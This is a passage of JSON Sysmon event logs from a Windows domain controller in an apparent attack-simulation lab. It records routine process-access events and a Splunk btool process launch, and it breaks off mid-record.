{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010F7860500}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010F7860500}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.695\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-0010B3870500}\r\nProcessId: 4948\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF6-5F25-0000-0010F7860500}\r\nParentProcessId: 1632\r\nParentImage: 